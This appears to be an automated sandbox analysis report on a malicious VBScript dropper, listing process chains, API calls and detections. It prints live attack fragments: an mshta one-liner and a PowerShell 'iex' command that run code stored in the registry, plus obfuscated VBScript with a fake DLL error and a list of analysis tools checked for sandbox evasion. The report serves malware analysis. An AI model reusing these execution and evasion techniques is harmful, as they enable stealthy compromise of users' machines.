Source: Yara match File source: 00000015.00000003.1103640775.0000000005809000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.1175334626.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1221119443.0000000000C91000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.1192551182.000000000550F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1103580587.000000000578A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04BC3276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 21_2_04BC3276

System Summary:

barindex
Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_6FBB2274 21_2_6FBB2274
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04BC7E30 21_2_04BC7E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04BC725F 21_2_04BC725F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04BC1754 21_2_04BC1754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E63570 21_2_05E63570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E490A1 21_2_05E490A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E45C88 21_2_05E45C88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E4FBA9 21_2_05E4FBA9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E543B9 21_2_05E543B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E57B5D 21_2_05E57B5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E5DAED 21_2_05E5DAED
Source: C:\Windows\System32\control.exe Code function: 32_2_00CBB948 32_2_00CBB948
Source: C:\Windows\System32\control.exe Code function: 32_2_00CBB230 32_2_00CBB230
Source: C:\Windows\System32\control.exe Code function: 32_2_00CA70C8 32_2_00CA70C8
Source: C:\Windows\System32\control.exe Code function: 32_2_00C990FC 32_2_00C990FC
Source: C:\Windows\System32\control.exe Code function: 32_2_00CB88B8 32_2_00CB88B8
Source: C:\Windows\System32\control.exe Code function: 32_2_00C91000 32_2_00C91000
Source: C:\Windows\System32\control.exe Code function: 32_2_00CA7820 32_2_00CA7820
Source: C:\Windows\System32\control.exe Code function: 32_2_00CAA9F8 32_2_00CAA9F8
Source: C:\Windows\System32\control.exe Code function: 32_2_00CA6944 32_2_00CA6944
Source: C:\Windows\System32\control.exe Code function: 32_2_00CAE95C 32_2_00CAE95C
Source: C:\Windows\System32\control.exe Code function: 32_2_00CA4150 32_2_00CA4150
Source: C:\Windows\System32\control.exe Code function: 32_2_00CA1164 32_2_00CA1164
Source: C:\Windows\System32\control.exe Code function: 32_2_00CB5164 32_2_00CB5164
Source: C:\Windows\System32\control.exe Code function: 32_2_00CA0124 32_2_00CA0124
Source: C:\Windows\System32\control.exe Code function: 32_2_00C92138 32_2_00C92138
Source: C:\Windows\System32\control.exe Code function: 32_2_00C99AD8 32_2_00C99AD8
Source: C:\Windows\System32\control.exe Code function: 32_2_00CABA74 32_2_00CABA74
Source: C:\Windows\System32\control.exe Code function: 32_2_00C9ABDC 32_2_00C9ABDC
Source: C:\Windows\System32\control.exe Code function: 32_2_00CB4BA0 32_2_00CB4BA0
Source: C:\Windows\System32\control.exe Code function: 32_2_00CBA3A4 32_2_00CBA3A4
Source: C:\Windows\System32\control.exe Code function: 32_2_00C91348 32_2_00C91348
Source: C:\Windows\System32\control.exe Code function: 32_2_00CA8340 32_2_00CA8340
Source: C:\Windows\System32\control.exe Code function: 32_2_00CB4354 32_2_00CB4354
Source: C:\Windows\System32\control.exe Code function: 32_2_00C94B60 32_2_00C94B60
Source: C:\Windows\System32\control.exe Code function: 32_2_00CB730C 32_2_00CB730C
Source: C:\Windows\System32\control.exe Code function: 32_2_00CAD328 32_2_00CAD328
Source: C:\Windows\System32\control.exe Code function: 32_2_00CA4484 32_2_00CA4484
Source: C:\Windows\System32\control.exe Code function: 32_2_00C974A4 32_2_00C974A4
Source: C:\Windows\System32\control.exe Code function: 32_2_00CB9408 32_2_00CB9408
Source: C:\Windows\System32\control.exe Code function: 32_2_00CB3400 32_2_00CB3400
Source: C:\Windows\System32\control.exe Code function: 32_2_00CB4DE0 32_2_00CB4DE0
Source: C:\Windows\System32\control.exe Code function: 32_2_00CA1DF4 32_2_00CA1DF4
Source: C:\Windows\System32\control.exe Code function: 32_2_00CA559C 32_2_00CA559C
Source: C:\Windows\System32\control.exe Code function: 32_2_00CA5DBC 32_2_00CA5DBC
Source: C:\Windows\System32\control.exe Code function: 32_2_00CA9500 32_2_00CA9500
Source: C:\Windows\System32\control.exe Code function: 32_2_00CA2EC0 32_2_00CA2EC0
Source: C:\Windows\System32\control.exe Code function: 32_2_00CAC6C4 32_2_00CAC6C4
Source: C:\Windows\System32\control.exe Code function: 32_2_00CB5ED8 32_2_00CB5ED8
Source: C:\Windows\System32\control.exe Code function: 32_2_00CB2EF8 32_2_00CB2EF8
Source: C:\Windows\System32\control.exe Code function: 32_2_00C976F4 32_2_00C976F4
Source: C:\Windows\System32\control.exe Code function: 32_2_00CA6684 32_2_00CA6684
Source: C:\Windows\System32\control.exe Code function: 32_2_00CB6EA0 32_2_00CB6EA0
Source: C:\Windows\System32\control.exe Code function: 32_2_00CB06B4 32_2_00CB06B4
Source: C:\Windows\System32\control.exe Code function: 32_2_00C93610 32_2_00C93610
Source: C:\Windows\System32\control.exe Code function: 32_2_00CAA790 32_2_00CAA790
Source: C:\Windows\System32\control.exe Code function: 32_2_00CAF7B4 32_2_00CAF7B4
Contains functionality to launch a process as a different user
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E5FEAB CreateProcessAsUserW, 21_2_05E5FEAB
Java / VBScript file with very long strings (likely obfuscated code)
Source: presentation[2021.09.09_15-26].vbs Initial sample: Strings found which are bigger than 50
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\fum.cpp 8C5BA29FBEEDF62234916D84F3A857A3B086871631FD87FABDFC0818CF049587
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_6FBB1382 GetProcAddress,NtCreateSection,memset, 21_2_6FBB1382
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_6FBB14FE SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 21_2_6FBB14FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_6FBB1B4A NtMapViewOfSection, 21_2_6FBB1B4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_6FBB2495 NtQueryVirtualMemory, 21_2_6FBB2495
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04BC6EB3 GetProcAddress,NtCreateSection,memset, 21_2_04BC6EB3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04BC40DC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 21_2_04BC40DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04BC7666 NtMapViewOfSection, 21_2_04BC7666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04BC8055 NtQueryVirtualMemory, 21_2_04BC8055
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E609D7 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 21_2_05E609D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E5B58C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 21_2_05E5B58C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E5A8F7 NtMapViewOfSection, 21_2_05E5A8F7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E58890 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 21_2_05E58890
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E5B878 GetProcAddress,NtCreateSection,memset, 21_2_05E5B878
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E55878 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 21_2_05E55878
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E5F7F5 NtQueryInformationProcess, 21_2_05E5F7F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E437F6 HeapFree,memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, 21_2_05E437F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E6079B GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 21_2_05E6079B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E5A71C NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 21_2_05E5A71C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E56657 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 21_2_05E56657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E50E3E NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 21_2_05E50E3E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E555D6 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 21_2_05E555D6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E45166 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 21_2_05E45166
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E49D36 NtGetContextThread,RtlNtStatusToDosError, 21_2_05E49D36
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E50CEF NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 21_2_05E50CEF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E60BAB NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 21_2_05E60BAB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E50FBD memset,NtQueryInformationProcess, 21_2_05E50FBD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E5FBB9 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 21_2_05E5FBB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E4579C NtQuerySystemInformation,RtlNtStatusToDosError, 21_2_05E4579C
Source: C:\Windows\System32\control.exe Code function: 32_2_00CBA8F0 NtSetInformationProcess,CreateRemoteThread, 32_2_00CBA8F0
Source: C:\Windows\System32\control.exe Code function: 32_2_00CB20A4 NtQueryInformationToken,NtQueryInformationToken,NtClose, 32_2_00CB20A4
Source: C:\Windows\System32\control.exe Code function: 32_2_00CAE860 NtQueryInformationProcess, 32_2_00CAE860
Source: C:\Windows\System32\control.exe Code function: 32_2_00CCF029 NtProtectVirtualMemory,NtProtectVirtualMemory, 32_2_00CCF029
Source: C:\Windows\System32\control.exe Code function: 32_2_00CCF36B NtProtectVirtualMemory, 32_2_00CCF36B
PE file does not import any functions
Source: tjafqng0.dll.27.dr Static PE information: No import functions for PE file found
Source: qlsida3o.dll.29.dr Static PE information: No import functions for PE file found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20210913 Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winVBS@22/20@6/1
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\presentation[2021.09.09_15-26].vbs'
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\presentation[2021.09.09_15-26].vbs'
Source: unknown Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: unknown Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Wfdc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wfdc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDDD0.tmp' 'c:\Users\user\AppData\Local\Temp\tjafqng0\CSC6B09D7CB2D7045B59F7434F2A8CE445.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESEAC0.tmp' 'c:\Users\user\AppData\Local\Temp\qlsida3o\CSCC809748AA5EB4643A41D26B71B98A016.TMP'
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.cmdline' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDDD0.tmp' 'c:\Users\user\AppData\Local\Temp\tjafqng0\CSC6B09D7CB2D7045B59F7434F2A8CE445.TMP' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESEAC0.tmp' 'c:\Users\user\AppData\Local\Temp\qlsida3o\CSCC809748AA5EB4643A41D26B71B98A016.TMP' Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04BC2102 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle, 21_2_04BC2102
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{7626F90B-5DEB-18F5-970A-E1CCBBDEA5C0}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5008:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{C659AAB4-6D66-E894-275A-F19C4B2EB590}
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{3E61FFA3-8597-20A3-FF52-8954A3A6CDC8}
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: presentation[2021.09.09_15-26].vbs Static file information: File size 1409283 > 1048576
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.pdbXP source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.pdbXP source: powershell.exe, 00000019.00000002.1238604024.000001B6D76F8000.00000004.00000001.sdmp
Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.1013379730.000001BA25DFD000.00000004.00000001.sdmp, rundll32.exe, 00000015.00000002.1193389238.000000006FBF4000.00000002.00020000.sdmp, fum.cpp.0.dr
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.pdb source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000015.00000003.1171105183.00000000063F0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000015.00000003.1171105183.00000000063F0000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.pdb source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp

Data Obfuscation:

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)REM diary character casework. 6326440 Fayetteville flaxen Doolittle Ballard backpack Alcoa loyal offertory Nicaragua axe Toni End WithEAX = MsgBox("Cant start because MSVCR101.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbSystemModal+vbCritical, "System Error")Gnk("DEBUG: F_MESSAGE - True")REM bow megabyte plenitude aspirate stationery. handicapper nit frozen restaurateur Tennessee Millikan hark limerick Macedon camel Brandon hereunto disquisition plasm anatomic End FunctionFunction yNzk()Gnk("DEBUG: FS_PROCESS - Start")REM emboss indigestion surly rebuttal Kaskaskia upslope lightface stimulus vintner tabernacle male shy inhibit bravado mozzarella otherwise Gnk("DEBUG: FS_PROCESSCOUNT - Start")on error resume nextDim Theodosian,AFQTheodosian=6000' elongate conjoin protactinium monocular warplane riot rubidium bebop skyward contributory metabole stepchild lenticular rich fleabane Frisian AFQ=3000Randomize' thieving Kurt sovereign Simpson, anthropomorphic rhombic Monica loan transpose larch least farmhouse mercuric, tabletop hoosegow highboy camelopard WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)yDVFproc = ((((42 + (-27.0)) + 343.0) - 276.0) + (-82.0))wSQ = Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","win
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_6FBB2210 push ecx; ret 21_2_6FBB2219
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_6FBB2263 push ecx; ret 21_2_6FBB2273
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04BC7AB0 push ecx; ret 21_2_04BC7AB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04BC7E1F push ecx; ret 21_2_04BC7E2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E6528F push ecx; ret 21_2_05E6529F
